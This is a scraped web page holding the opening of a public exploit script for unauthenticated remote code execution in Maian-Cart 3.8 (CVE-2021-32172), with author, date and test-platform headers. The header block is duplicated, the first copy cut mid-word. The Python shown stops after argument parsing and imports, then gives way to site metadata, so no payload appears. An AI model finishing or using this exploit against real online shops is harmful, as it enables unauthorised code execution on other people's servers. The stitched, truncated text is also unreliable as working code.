# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Softwa # Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172
#!/usr/bin/python3
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()
#args
host = sys.argv[1]
directory = sys.argv[2]
#CREATE THE FILE
print("
Maian-Cart 3.8 Remote Code Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 286